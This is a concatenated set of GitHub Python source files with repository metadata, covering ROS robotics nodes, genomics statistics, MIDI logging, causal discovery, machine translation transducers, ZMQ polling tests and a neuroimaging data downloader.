= points[i+1].y;\n p.z = points[i+1].z;\n marker.points.append(p) \n \n for i in range(5,8):\n p = Point()\n p.x = points[i].x;\n p.y = points[i].y;\n p.z = points[i].z;\n marker.points.append(p)\n \n p = Point()\n p.x = points[i+1].x;\n p.y = points[i+1].y;\n p.z = points[i+1].z;\n marker.points.append(p) \n \n \n for i in range(9,12):\n p = Point()\n p.x = points[i].x;\n p.y = points[i].y;\n p.z = points[i].z;\n marker.points.append(p)\n \n p = Point()\n p.x = points[i+1].x;\n p.y = points[i+1].y;\n p.z = points[i+1].z;\n marker.points.append(p) \n \n for i in range(13,16):\n p = Point()\n p.x = points[i].x;\n p.y = points[i].y;\n p.z = points[i].z;\n marker.points.append(p)\n \n p = Point()\n p.x = points[i+1].x;\n p.y = points[i+1].y;\n p.z = points[i+1].z;\n marker.points.append(p) \n \n for i in range(17,20):\n p = Point()\n p.x = points[i].x;\n p.y = points[i].y;\n p.z = points[i].z;\n marker.points.append(p)\n \n p = Point()\n p.x = points[i+1].x;\n p.y = points[i+1].y;\n p.z = points[i+1].z;\n marker.points.append(p) \n \n position = [0,5,9,13,17,0] \n for i in range(0,len(position)-1):\n p = Point()\n p.x = points[position[i]].x;\n p.y = points[position[i]].y;\n p.z = points[position[i]].z;\n marker.points.append(p)\n \n p = Point()\n p.x = points[position[i+1]].x;\n p.y = points[position[i+1]].y;\n p.z = points[position[i+1]].z;\n marker.points.append(p) \n \n return marker \n \n \n \n \ndef main(args=None):\n rclpy.init(args=args)\n mediapipe_hands = MediapipeHandsROS2()\n rclpy.spin(mediapipe_hands)\n minimal_subscriber.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"marco-teixeira/ros2_humble_mediapipe","sub_path":"ros2_mediapipe/ros2_mediapipe/mediapipe_hands.py","file_name":"mediapipe_hands.py","file_ext":"py","file_size_in_byte":14018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6382662014","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 26 19:01:03 2017\n\n@author: scott\n\"\"\"\nimport allel\nfrom amask import access_mask\n\n\ndef roh(subpops, chrpos, chrdict, nchr, chrmaskdict):\n \"\"\"Runs of Homozygosity for each individual sample\n phet_roh: prob of obs a het within a RoH ~mutation rate\n phet_nonroh: >1 prob of obs het outside of RoH, ~nucleotide div\n \"\"\"\n m = access_mask(chrmaskdict, nchr)\n for pop in subpops: # Haiti\n for indx in pop: # 1, 2, 3, 4, ... 8\n gn = chrdict[nchr].genotypes[:, indx]\n het_mask = gn.is_het()\n gt = gn.compress(het_mask)\n call_mask = gn.is_called() # all sites called\n posmask = call_mask * het_mask\n pos = chrdict[nchr].positions[posmask]\n df, prop = allel.stats.roh.roh_mhmm(gt, pos, phet_roh=0.001,\n phet_nonroh=(0.0025, 0.01),\n is_accessible=m)\n return(None)\n","repo_name":"stsmall/allel_scripts","sub_path":"fxs/aroh.py","file_name":"aroh.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"19031426774","text":"\nimport os\nimport signal\n\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\nimport mido\n\n\n\f\n## INIT - MIDI\n\nmido.set_backend('mido.backends.pygame')\n\ninport = mido.open_input('MidiSport 1x1 MIDI 1')\n\ndef cleanup_mido():\n inport.close()\n\ndef handler(signum, frame):\n cleanup_mido()\n\nsignal.signal(signal.SIGHUP, handler)\n\n\n\f\n## MAIN\n\ntry:\n for msg in inport:\n print(\"-----------------\")\n print(msg)\n print(msg.hex())\nexcept KeyboardInterrupt as e:\n cleanup_mido()\n","repo_name":"p3r7/lexicon-mpx1-sysex-tests","sub_path":"tail.py","file_name":"tail.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"41154029646","text":"class Solution:\n def findLeastNumOfUniqueInts(self, arr: List[int], k: int) -> int:\n hmap = {}\n for i in arr:\n hmap[i] = hmap.get(i, 0) + 1\n \n hmap = dict(sorted(hmap.items(), key = lambda x: x[1]))\n zero_count = 0\n \n for key, value in hmap.items():\n if value <= k:\n k -= hmap[key]\n zero_count += 1\n print(hmap, zero_count)\n return len(hmap) - zero_count\n \n ","repo_name":"tejeshreddy/competitive-programming","sub_path":"1481-least-number-of-unique-integers-after-k-removals/1481-least-number-of-unique-integers-after-k-removals.py","file_name":"1481-least-number-of-unique-integers-after-k-removals.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"70785391625","text":"class DataModel:\n '''\n Contains lists about description of problem\n '''\n def __init__(self, quantityOfPoint, weightCluster, \n weightOfPoints, weightOfVehicle, typeOfPoint,\n depot):\n self.depot = depot - 1\n self.typeOfPoint = typeOfPoint \n self.quantityOfPoint = quantityOfPoint\n self.weightCluster = weightCluster\n self.weightOfPoints = weightOfPoints\n self.weightOfVehicle = weightOfVehicle\n","repo_name":"flower-blossom/p-median","sub_path":"utils/DataModel.py","file_name":"DataModel.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73839486984","text":"\"\"\"\nA proxy to pgmpy structure estimators\nsee: https://github.com/pgmpy/pgmpy\n\"\"\"\nimport inspect\n\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nfrom pgmpy import estimators as A\n\nfrom ylearn.utils import set_random_state, logging\nfrom ._base import BaseDiscovery\n\nlogger = logging.get_logger(__name__)\n\n_default_options = dict(\n PC=dict(variant=\"stable\",\n ci_test=\"pearsonr\", # default continuous datasets.\n show_progress=False),\n)\n\n\nclass PgmProxy(BaseDiscovery):\n def __init__(self, learner='PC', random_state=None, **kwargs):\n assert isinstance(learner, str) and hasattr(A, learner), \\\n f'Not found learner \"{learner}\" from pgmpy.estimators'\n c = getattr(A, learner)\n assert issubclass(c, A.StructureEstimator)\n\n self.learner = learner\n self.options = kwargs.copy()\n self.random_state = random_state\n\n def _create_learner(self, data, options):\n c = getattr(A, self.learner) if self.learner is not None else A.PC\n\n kwargs = {}\n for k in inspect.signature(c.__init__).parameters.keys():\n if k in options.keys():\n kwargs[k] = options.pop(k)\n return c(data, **kwargs)\n\n def __call__(self, data, *, return_dict=False, threshold=None, **kwargs):\n assert isinstance(data, (np.ndarray, pd.DataFrame))\n\n set_random_state(self.random_state)\n\n if isinstance(data, pd.DataFrame):\n df = data\n else:\n df = pd.DataFrame(data)\n\n options = _default_options.get(self.learner, {}).copy()\n options.update(**self.options)\n learner = self._create_learner(df, options)\n\n logger.info(f'discovery causation with {type(learner).__name__}')\n if isinstance(learner, A.PC):\n options['return_type'] = 'dag'\n dag = learner.estimate(**options)\n\n columns = df.columns.tolist()\n nodes = list(dag.nodes)\n assert set(nodes).issubset(set(columns))\n\n matrix_learned = pd.DataFrame(nx.to_numpy_array(dag, nodelist=nodes, weight=None),\n columns=nodes, index=nodes)\n matrix_full = pd.DataFrame(np.zeros((df.shape[1], df.shape[1])),\n columns=columns, index=columns)\n matrix_full = (matrix_full + matrix_learned).fillna(0.0)\n\n if isinstance(data, pd.DataFrame):\n matrix = matrix_full\n else:\n matrix = matrix_full.values\n\n if return_dict:\n result = self.matrix2dict(matrix)\n else:\n result = matrix\n\n return result\n","repo_name":"DataCanvasIO/YLearn","sub_path":"ylearn/causal_discovery/_proxy_pgm.py","file_name":"_proxy_pgm.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"81"} +{"seq_id":"73186471306","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 21 11:23:53 2022\n\n@author: je_su\n\"\"\"\n\n\nfrom modulos.juego_guerra import JuegoGuerra\nimport unittest\n\n\nclass TestJuegoGuerra(unittest.TestCase):\n \n def test_resulta_gana_jugador1(self):\n \"\"\"\n Compruebo el número de turnos de 3 partidas con\n el jugador 1 como ganador\n \"\"\"\n\n # jugador 1 gana la partida en el turno 137\n self.juego_1 = JuegoGuerra(random_seed=314)\n # jugador 1 gana la partida en el turno 638\n self.juego_2 = JuegoGuerra(random_seed=59)\n # jugador 1 gana la partida en el turno 1383\n self.juego_3 = JuegoGuerra(random_seed=883)\n\n self.juego_1.iniciar_juego()\n self.juego_2.iniciar_juego()\n self.juego_3.iniciar_juego()\n \n self.assertEqual(self.juego_1.turnos_jugados, 137)\n self.assertEqual(self.juego_1.ganador, 'jugador 1')\n \n self.assertEqual(self.juego_2.turnos_jugados, 638)\n self.assertEqual(self.juego_2.ganador, 'jugador 1')\n \n self.assertEqual(self.juego_3.turnos_jugados, 1383)\n self.assertEqual(self.juego_3.ganador, 'jugador 1')\n \n \n def test_resulta_gana_jugador2(self):\n \"\"\"\n compruebo el número de turnos de 3 partidas con\n el jugador 2 como ganador\n \"\"\"\n\n # jugador 2 gana la partida en el turno 145\n self.juego_4 = JuegoGuerra(random_seed=167)\n # jugador 2 gana la partida en el turno 1112\n self.juego_5 = JuegoGuerra(random_seed=190)\n # jugador 2 gana la partida en el turno 1373 por Guerra\n self.juego_6 = JuegoGuerra(random_seed=735)\n\n self.juego_4.iniciar_juego()\n self.juego_5.iniciar_juego()\n self.juego_6.iniciar_juego()\n \n self.assertEqual(self.juego_4.turnos_jugados, 145)\n self.assertEqual(self.juego_4.ganador, 'jugador 2')\n \n self.assertEqual(self.juego_5.turnos_jugados, 1112)\n self.assertEqual(self.juego_5.ganador, 'jugador 2')\n \n self.assertEqual(self.juego_6.turnos_jugados, 1373)\n self.assertEqual(self.juego_6.ganador, 'jugador 2')\n \n def test_resulta_empate(self):\n \"\"\"\n compruebo el resultado de 2 partidas con empate\n \"\"\"\n\n # juego empate\n self.juego_7 = JuegoGuerra(random_seed=547)\n self.juego_8 = JuegoGuerra(random_seed=296)\n\n self.juego_7.iniciar_juego()\n self.juego_8.iniciar_juego()\n \n self.assertTrue(self.juego_7.empate)\n self.assertTrue(self.juego_8.empate)\n\nclass TestMazo(unittest.TestCase):\n def setUp(self):\n self.mazo= Mazo()\n\n# Chequeo de repartir/poner arriba, sacar arriba/principio y poner abajo/final\n def test_poner_sacar_arriba(self): #Poner arriba al momento de repartir las cartas, sacar arriba al momento de jugar el turno\n carta1=Carta('5','trebol')\n self.mazo.poner_arriba(carta1)\n self.assertIs(carta1, self.mazo.mazo.items[0])\n carta2=self.mazo.sacar_arriba()\n self.assertIs(carta1, carta2)\n\n# def test_poner_abajo(self): #Poner abajo al momento de ganar el turno\n \n \n \nif __name__ == '__main__':\n unittest.main()\n","repo_name":"marianiz/Practica-Algoritmos","sub_path":"TP1_juego_guerra/pruebas/test_juego_guerra.py","file_name":"test_juego_guerra.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4774913577","text":"#! /usr/bin/env python\r\n\r\n\"\"\"! @file test_oracle_plus_interface.py\r\n\r\n@brief testing the nodes cluedo_oracle.cpp and cluedo_armor_interface.cpp\r\n \r\n@authors Francesco Ganci (S4143910)\r\n@version v1.0\r\n\r\nEach time an hint arrives, store it into the ontology. \r\n\r\n@see test_cluedo_oracle_plus_interface.launch launch file for the test\r\n\r\n\"\"\"\r\n\r\nimport rospy\r\nfrom robocluedo_msgs.srv import CheckSolution, CheckSolutionRequest, CheckSolutionResponse\r\nfrom std_msgs.msg import Empty\r\nfrom robocluedo_msgs.msg import Hint\r\nfrom robocluedo_msgs.srv import AddHint, AddHintRequest, AddHintResponse\r\nfrom robocluedo_msgs.srv import FindConsistentHypotheses, FindConsistentHypothesesRequest, FindConsistentHypothesesResponse\r\nfrom robocluedo_msgs.msg import Hypothesis\r\nfrom robocluedo_msgs.srv import DiscardHypothesis, DiscardHypothesisRequest, DiscardHypothesisResponse\r\nfrom std_srvs.srv import Trigger, TriggerRequest, TriggerResponse\r\n\r\n\r\n\r\n\r\nclient_name_check_solution = \"/check_solution\"\r\nclient_check_solution = None\r\n\r\npublisher_name_hint_sig = \"/hint_signal\"\r\npublisher_hint_sig = None\r\n\r\nsubscriber_name_hint = \"/hint\"\r\n\r\nclient_name_add_hint = \"/cluedo_armor/add_hint\"\r\nclient_add_hint = None\r\n\r\nclient_name_find_consistent_h = \"/cluedo_armor/find_consistent_h\"\r\nclient_find_consistent_h = None\r\n\r\nclient_name_wrong_h = \"/cluedo_armor/wrong_hypothesis\"\r\nclient_wrong_h = None\r\n\r\nclient_name_backup = \"/cluedo_armor/backup\"\r\nclient_backup = None\r\n\r\n\r\n\r\n\r\ntest_name = \"test_oracle_plus_interface\"\r\n\r\n\r\ndef make_hint_to_ontology( id, prop, val ):\r\n\tsrv_hint = AddHintRequest( )\r\n\t\r\n\t''' add hint request\r\n\t# the numeric ID of the hint\r\n\tint32 hypID\r\n\r\n\t# fields of the property\r\n\tstring property\r\n\tstring Aelem\r\n\tstring Belem\r\n\t'''\r\n\t\r\n\tsrv_hint.hypID = id\r\n\tsrv_hint.property = prop\r\n\tsrv_hint.Aelem = \"HP\" + str( id )\r\n\tsrv_hint.Belem = val\r\n\t\r\n\treturn srv_hint\r\n\r\n\r\ndef callback_hint( hint ):\r\n\tglobal hint_idx\r\n\tglobal received\r\n\tglobal client_add_hint\r\n\t\r\n\trospy.loginfo( \"[%s] (number %d) received: HP%d(%s:%s)\", test_name, hint_idx, hint.HintID, hint.HintType, hint.HintContent )\r\n\t\r\n\trospy.loginfo( \"[%s] adding hint to the ontology... \", test_name )\r\n\tclient_add_hint( make_hint_to_ontology( hint.HintID, hint.HintType, hint.HintContent ) )\r\n\t\r\n\thplist = client_find_consistent_h( ).hyp\r\n\tif len(hplist) > 0:\r\n\t\trospy.loginfo( \"[%s] consistent hypotheses right now: \", test_name )\r\n\t\trospy.loginfo( \"[%s] received size : %d \", test_name, len(hplist) )\r\n\t\tfor i in range( len(hplist) ):\r\n\t\t\trospy.loginfo( \"[%s] -> %s(where:%s, what:%s, who:%s)\", test_name, hplist[i].tag, hplist[i].where, hplist[i].what, hplist[i].who )\r\n\r\n\r\n\r\n\r\nhint_idx = 0\r\nreceived = False\r\ndef perform_tests( ):\r\n\tglobal publisher_name_hint_sig\r\n\tglobal client_check_solution\r\n\tglobal hint_idx\r\n\t\r\n\t# rospy.loginfo( \"number 1: hint system\" )\r\n\t\r\n\tfor hintno in range( 50 ):\r\n\t\trospy.loginfo( \"[%s] sending signal %d ...\", test_name, hint_idx )\r\n\t\tpublisher_hint_sig.publish( Empty( ) )\r\n\t\thint_idx = hint_idx + 1\r\n\t\trospy.sleep( rospy.Duration( 0.1 ) )\r\n\t\r\n\trospy.loginfo( \"[%s] saving the ontology...\", test_name )\r\n\tclient_backup( )\r\n\r\n\r\n\r\n\r\ndef main( ):\r\n\t# global \r\n\t\r\n\t# altre operazioni utili prima di iniziare i test...\r\n\t\r\n\tperform_tests( )\r\n\r\n\r\n\r\n\r\ndef on_shut_msg( ):\r\n\trospy.loginfo( \"[%s] closing...\", test_name )\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\trospy.init_node( test_name )\r\n\trospy.on_shutdown( on_shut_msg )\r\n\t\r\n\t# client : check solution\r\n\trospy.loginfo( \"[%s] asking for service [%s] ...\", test_name, client_name_check_solution )\r\n\trospy.wait_for_service( client_name_check_solution )\r\n\tclient_check_solution = rospy.ServiceProxy( client_name_check_solution, CheckSolution )\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\t# publisher : hint signal\r\n\trospy.loginfo( \"[%s] opening publisher to topic [%s] ...\", test_name, publisher_name_hint_sig )\r\n\tpublisher_hint_sig = rospy.Publisher( publisher_name_hint_sig, Empty, queue_size=1 )\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\t# subscriber : hint\r\n\trospy.loginfo( \"[%s] subscribing to topic [%s] ...\", test_name, subscriber_name_hint )\r\n\t# rospy.wait_for_message( subscriber_name_hint, Hint )\r\n\trospy.Subscriber( subscriber_name_hint, Hint, callback_hint )\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\t# service : add hint\r\n\trospy.loginfo( \"[%s] asking for service [%s] ...\", test_name, client_name_add_hint )\r\n\trospy.wait_for_service( client_name_add_hint )\r\n\tclient_add_hint = rospy.ServiceProxy( client_name_add_hint, AddHint )\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\t# service : find consistent hypotheses\r\n\trospy.loginfo( \"[%s] asking for service [%s] ...\", test_name, client_name_find_consistent_h )\r\n\trospy.wait_for_service( client_name_find_consistent_h )\r\n\tclient_find_consistent_h = rospy.ServiceProxy( client_name_find_consistent_h, FindConsistentHypotheses )\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\t# service : wrong hypothesis\r\n\trospy.loginfo( \"[%s] asking for service [%s] ...\", test_name, client_name_wrong_h )\r\n\trospy.wait_for_service( client_name_wrong_h )\r\n\tclient_wrong_h = rospy.ServiceProxy( client_name_wrong_h, DiscardHypothesis )\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\t# service : backup\r\n\trospy.loginfo( \"[%s] asking for service [%s] ...\", test_name, client_name_backup )\r\n\trospy.wait_for_service( client_name_backup )\r\n\tclient_backup = rospy.ServiceProxy( client_name_backup, Trigger )\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\tmain( )\r\n","repo_name":"programmatoroSeduto/ExperimentalRoboticsLab-Assignment-1","sub_path":"robocluedo/scripts/test_oracle_plus_interface.py","file_name":"test_oracle_plus_interface.py","file_ext":"py","file_size_in_byte":5442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1232043696","text":"from typing import List\nimport numbers\n\nimport xnmt\nimport xnmt.tensor_tools as tt\nfrom xnmt.modelparts import transforms\nfrom xnmt.persistence import serializable_init, Serializable\nfrom xnmt import expression_seqs\n\nif xnmt.backend_dynet:\n import dynet as dy\n\nclass FinalTransducerState(object):\n \"\"\"\n Represents the final encoder state; Currently handles a main (hidden) state and a cell\n state. If cell state is not provided, it is created as tanh^{-1}(hidden state).\n Could in the future be extended to handle dimensions other than h and c.\n\n Args:\n main_expr: expression for hidden state\n cell_expr: expression for cell state, if exists\n \"\"\"\n def __init__(self, main_expr: tt.Tensor, cell_expr: tt.Tensor=None) -> None:\n self._main_expr = main_expr\n self._cell_expr = cell_expr\n\n def main_expr(self) -> tt.Tensor:\n return self._main_expr\n\n def cell_expr(self) -> tt.Tensor:\n \"\"\"Returns:\n cell state; if not given, it is inferred as inverse tanh of main expression\n \"\"\"\n if self._cell_expr is None:\n # TODO: This taking of the tanh inverse is disabled, because it can cause NaNs\n # Instead just copy\n # self._cell_expr = 0.5 * dy.log( dy.cdiv(1.+self._main_expr, 1.-self._main_expr) )\n self._cell_expr = self._main_expr\n return self._cell_expr\n\nclass SeqTransducer(object):\n \"\"\"\n A class that transforms one sequence of vectors into another, using :class:`expression_seqs.ExpressionSequence` objects as inputs and outputs.\n \"\"\"\n\n def transduce(self, seq: 'expression_seqs.ExpressionSequence') -> 'expression_seqs.ExpressionSequence':\n \"\"\"\n Parameters should be :class:`expression_seqs.ExpressionSequence` objects wherever appropriate\n\n Args:\n seq: An expression sequence representing the input to the transduction\n\n Returns:\n result of transduction, an expression sequence\n \"\"\"\n raise NotImplementedError(\"SeqTransducer.transduce() must be implemented by SeqTransducer sub-classes\")\n\n def get_final_states(self) -> List[FinalTransducerState]:\n \"\"\"Returns:\n A list of FinalTransducerState objects corresponding to a fixed-dimension representation of the input, after having invoked transduce()\n \"\"\"\n raise NotImplementedError(\"SeqTransducer.get_final_states() must be implemented by SeqTransducer sub-classes\")\n\n\n########################################################\n\nclass ModularSeqTransducer(SeqTransducer, Serializable):\n \"\"\"\n A sequence transducer that stacks several :class:`xnmt.transducer.SeqTransducer` objects, all of which must\n accept exactly one argument (an :class:`expression_seqs.ExpressionSequence`) in their transduce method.\n \n Args:\n input_dim: input dimension (not required)\n modules: list of SeqTransducer modules\n \"\"\"\n\n yaml_tag = '!ModularSeqTransducer'\n\n @serializable_init\n def __init__(self, input_dim: numbers.Integral, modules: List[SeqTransducer]):\n self.modules = modules\n\n def shared_params(self):\n return [{\".input_dim\", \".modules.0.input_dim\"}]\n\n def transduce(self, seq: 'expression_seqs.ExpressionSequence') -> 'expression_seqs.ExpressionSequence':\n for module in self.modules:\n seq = module.transduce(seq)\n return seq\n\n def get_final_states(self) -> List[FinalTransducerState]:\n final_states = []\n for mod in self.modules:\n final_states += mod.get_final_states()\n return final_states\n\n\nclass IdentitySeqTransducer(SeqTransducer, Serializable):\n \"\"\"\n A transducer that simply returns the input.\n \"\"\"\n\n yaml_tag = '!IdentitySeqTransducer'\n\n @serializable_init\n def __init__(self) -> None:\n pass\n\n def transduce(self, seq: 'expression_seqs.ExpressionSequence') -> 'expression_seqs.ExpressionSequence':\n return seq\n\n@xnmt.require_dynet\nclass TransformSeqTransducerDynet(SeqTransducer, Serializable):\n \"\"\"\n A sequence transducer that applies a given transformation to the sequence's tensor representation\n\n Args:\n transform: the Transform to apply to the sequence\n downsample_by: if > 1, downsample the sequence via appropriate reshapes.\n The transform must accept a respectively larger hidden dimension.\n \"\"\"\n yaml_tag = '!TransformSeqTransducer'\n\n @serializable_init\n def __init__(self, transform: transforms.Transform, downsample_by: numbers.Integral = 1) -> None:\n self.transform = transform\n if downsample_by < 1: raise ValueError(f\"downsample_by must be >=1, was {downsample_by}\")\n self.downsample_by = downsample_by\n\n def get_final_states(self) -> List[FinalTransducerState]:\n return self._final_states\n\n def transduce(self, src: expression_seqs.ExpressionSequence) -> expression_seqs.ExpressionSequence:\n src_tensor = src.as_tensor()\n out_mask = src.mask\n if self.downsample_by > 1:\n assert len(src_tensor.dim()[0])==2, \\\n f\"Downsampling only supported for tensors of order two. Found dims {src_tensor.dim()}\"\n (hidden_dim, seq_len), batch_size = src_tensor.dim()\n if seq_len % self.downsample_by != 0:\n raise ValueError(\n \"For downsampling, sequence lengths must be multiples of the total reduce factor. \"\n \"Configure batcher accordingly.\")\n src_tensor = dy.reshape(src_tensor,\n (hidden_dim*self.downsample_by, seq_len//self.downsample_by),\n batch_size=batch_size)\n if out_mask:\n out_mask = out_mask.lin_subsampled(reduce_factor=self.downsample_by)\n output = self.transform.transform(src_tensor)\n if self.downsample_by==1:\n if len(output.dim())!=src_tensor.dim(): # can happen with seq length 1\n output = dy.reshape(output, src_tensor.dim()[0], batch_size=src_tensor.dim()[1])\n output_seq = expression_seqs.ExpressionSequence(expr_tensor=output, mask=out_mask)\n self._final_states = [FinalTransducerState(output_seq[-1])]\n return output_seq\n\n\n@xnmt.require_torch\nclass TransformSeqTransducerTorch(SeqTransducer, Serializable):\n \"\"\"\n A sequence transducer that applies a given transformation to the sequence's tensor representation\n\n Args:\n transform: the Transform to apply to the sequence\n downsample_by: if > 1, downsample the sequence via appropriate reshapes.\n The transform must accept a respectively larger hidden dimension.\n \"\"\"\n yaml_tag = '!TransformSeqTransducer'\n\n @serializable_init\n def __init__(self, transform: transforms.Transform, downsample_by: numbers.Integral = 1) -> None:\n self.transform = transform\n if downsample_by < 1: raise ValueError(f\"downsample_by must be >=1, was {downsample_by}\")\n self.downsample_by = downsample_by\n\n def get_final_states(self) -> List[FinalTransducerState]:\n return self._final_states\n\n def transduce(self, src: expression_seqs.ExpressionSequence) -> expression_seqs.ExpressionSequence:\n src_tensor = src.as_tensor()\n out_mask = src.mask\n if self.downsample_by > 1:\n assert src_tensor.dim()==3, \\\n f\"Downsampling only supported for tensors of order two (+ batch). Found dims {src_tensor.size()}\"\n batch_size , seq_len, hidden_dim = src_tensor.size()\n if seq_len % self.downsample_by != 0:\n raise ValueError(\n \"For downsampling, sequence lengths must be multiples of the total reduce factor. \"\n \"Configure batcher accordingly.\")\n src_tensor = src_tensor.view((batch_size, seq_len//self.downsample_by, hidden_dim*self.downsample_by))\n if out_mask:\n out_mask = out_mask.lin_subsampled(reduce_factor=self.downsample_by)\n output = self.transform.transform(src_tensor)\n output_seq = expression_seqs.ExpressionSequence(expr_tensor=output, mask=out_mask)\n self._final_states = [FinalTransducerState(output_seq[-1])]\n return output_seq\n\nTransformSeqTransducer = xnmt.resolve_backend(TransformSeqTransducerDynet, TransformSeqTransducerTorch)","repo_name":"neulab/xnmt","sub_path":"xnmt/transducers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7857,"program_lang":"python","lang":"en","doc_type":"code","stars":184,"dataset":"github-code","pt":"81"} +{"seq_id":"4282490252","text":"from django.test import TestCase, override_settings\n\nfrom core.utils import (\n internal_redirect,\n)\n\n\nclass TestUtils(TestCase):\n @override_settings(\n ALLOWED_HOSTS=[\n \"trade-remedies.com\",\n ]\n )\n def test_internal_redirect(self):\n test_redirect = internal_redirect(\n \"https://trade-remedies.com/test\",\n \"/dashboard/\",\n )\n\n assert test_redirect.url == \"https://trade-remedies.com/test\"\n\n test_redirect = internal_redirect(\n \"https://www.google.com/?test=1\",\n \"/dashboard/\",\n )\n\n assert test_redirect.url == \"/dashboard/\"\n","repo_name":"uktrade/trade-remedies-caseworker","sub_path":"trade_remedies_caseworker/core/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"19842469756","text":"# -*- coding: utf-8 -\n#\n# This file is part of uzmq. See the NOTICE for more information.\n\nimport pyuv\nimport zmq\nfrom zmq.tests import BaseZMQTestCase\n\nimport time\n\nfrom uzmq import ZMQPoll\n\ndef wait():\n time.sleep(.25)\n\nclass TestPoll(BaseZMQTestCase):\n\n def test_simple(self):\n \"\"\"Tornado poller implementation maps events correctly\"\"\"\n req,rep = self.create_bound_pair(zmq.REQ, zmq.REP)\n\n loop = pyuv.Loop.default_loop()\n poll = ZMQPoll(loop, rep)\n\n r = []\n def cb(handle, ev, error):\n r.append(ev & pyuv.UV_READABLE)\n r.append(rep.recv())\n\n poll.start(pyuv.UV_READABLE, cb)\n req.send(b'req')\n t = pyuv.Timer(loop)\n\n def stop(h):\n poll.stop()\n\n t = pyuv.Timer(loop)\n t.start(stop, 0.4, 0.0)\n loop.run()\n\n assert r == [1, b'req']\n\n def test_poll_rw(self):\n \"\"\"Tornado poller implementation maps events correctly\"\"\"\n req,rep = self.create_bound_pair(zmq.REQ, zmq.REP)\n wait()\n\n loop = pyuv.Loop.default_loop()\n poll = ZMQPoll(loop, rep)\n poll1 = ZMQPoll(loop, req)\n\n r = []\n def cb(handle, ev, error):\n r.append(ev & pyuv.UV_READABLE)\n r.append(rep.recv())\n handle.close()\n\n def cb1(handle, ev, error):\n\n r.append(ev & pyuv.UV_WRITABLE)\n req.send(b'req')\n handle.stop()\n\n poll.start(pyuv.UV_READABLE, cb)\n poll1.start(pyuv.UV_WRITABLE, cb1)\n\n t = pyuv.Timer(loop)\n\n def stop(h):\n poll.stop()\n poll1.close()\n\n loop.run()\n\n assert r == [2, 1, b'req']\n\n def test_echo(self):\n req, rep = self.create_bound_pair(zmq.REQ, zmq.REP)\n wait()\n\n loop = pyuv.Loop.default_loop()\n p = ZMQPoll(loop, rep)\n p1 = ZMQPoll(loop, req)\n\n r = []\n r1 = []\n\n def cb(handle, ev, error):\n if ev & pyuv.UV_READABLE:\n data = rep.recv()\n r.append(data)\n\n\n if ev & pyuv.UV_WRITABLE:\n rep.send(r[-1])\n if len(r) == 2:\n handle.stop()\n\n\n\n def cb1(handle, ev, error):\n if ev & pyuv.UV_READABLE:\n data = req.recv()\n r1.append(data)\n\n if len(r1) == 2:\n handle.stop()\n\n\n if ev & pyuv.UV_WRITABLE:\n req.send(b\"echo\")\n\n\n p.start(pyuv.UV_READABLE | pyuv.UV_WRITABLE, cb)\n p1.start(pyuv.UV_READABLE | pyuv.UV_WRITABLE, cb1)\n\n\n req.send(b\"echo\")\n\n def stop(h):\n p.close()\n p1.close()\n\n loop.run()\n\n assert r == [b'echo', b'echo']\n assert r1 == [b'echo', b'echo']\n","repo_name":"benoitc/uzmq","sub_path":"tests/test_poll.py","file_name":"test_poll.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"81"} +{"seq_id":"21480574846","text":"#Run this file to download any required packages and organize the NMA preprocessed HCP data\n#\n#Example use:\n#\t- Download resting state data: python data_downloader.py rest\n#\t- Download all data (not recommended): python data_downloader.py\n#\n#Written by TLB 2020\n\nimport os, sys, requests, tarfile\nimport shutil\nfrom tqdm import tqdm #for monitoring download progress\n\ndef download_preprocessed_hcp(dataset_dict, download_dir):\n\t'''\n\n\tArgs:\n\t\t- dataset_dict (dict): a dictionary where keys are the name of the current preprocessed \n\t\t\tdataset to download ('rest, 'task', or 'covariates') and values are a list containing\n\t\t\tname to write file and OSF weblink to the dataset\n\t\t- download_dir (string): where to write downloaded files\n\t'''\n\n\tfor dataset, info in dataset_dict.items():\n\t\tfname, weblink = info\n\t\tdownload_path = f'{download_dir}/{fname}'\n\n\t\tif not os.path.exists(download_path): #grab the data file from the OSF weblink\n\n\t\t\tresponse = requests.get(f'{weblink}', stream=True)\n\n\t\t\ttotal_size = int(response.headers.get('content-length', 0))\n\t\t\tblock_size = 1024 #1 Kibibyte\n\n\t\t\tif response.status_code == 200:\n\t\t\t\tprint (f'Downloading {fname} to 